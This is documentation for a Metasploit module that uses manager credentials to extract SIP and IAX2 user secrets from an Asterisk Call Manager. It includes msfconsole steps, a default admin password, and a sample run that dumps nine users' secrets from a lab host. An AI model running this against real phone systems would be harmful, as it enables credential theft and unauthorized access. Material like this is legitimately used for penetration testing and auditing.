2.2 KiB
2.2 KiB
Description
This module retrieves SIP and IAX2 user extensions and credentials from Asterisk Call Manager service.
Valid manager credentials are required.
Vulnerable Application
Asterisk offers both classical PBX functionality and advanced features, and interoperates with traditional standards-based telephony systems and Voice over IP systems.
This module has been tested successfully on:
- Asterisk Call Manager version 2.10.0 on Asterisk 13.16.0
- Asterisk Call Manager version 1.1 on Asterisk 1.6.2.11
The following software comes with Asterisk preinstalled and can be used for testing purposes:
Note that Asterisk will reject valid authentication credentials when connecting from a network that has not been permitted using the permit directive (or is specifically denied in the deny directive) in the Asterisk manager configuration file /etc/asterisk/manager.conf.
Verification Steps
- Start
msfconsole - Do:
use auxiliary/gather/asterisk_creds - Do:
set rhost <RHOST> - Do:
set rport <RPORT>(default:5038) - Do:
set username <USERNAME>(default:admin) - Do:
set password <PASSWORD>(default:amp111) - Do:
run - You should get credentials
Scenarios
[*] 172.16.191.229:5038 - Found Asterisk Call Manager version 2.10.0
[+] 172.16.191.229:5038 - Authenticated successfully
[*] 172.16.191.229:5038 - Found 9 users
Asterisk User Credentials
=========================
Username Secret Type
-------- ------ ----
100 sip
103 bbf5d449753391a sip
104 273db6cd9ca402f53354 iax2
105 secret password sip
106 "_" ;) iax2
107 123456789 sip
108 ~!@#$%^&*()_+{} sip
109 antidisestablishment iax2
123 y2u.be/VOaZbaPzdsk iax2
[+] 172.16.191.229:5038 - Credentials saved in: /root/.msf4/loot/20170723052316_default_172.16.191.229_asterisk.user.cr_798166.txt
[*] Auxiliary module execution completed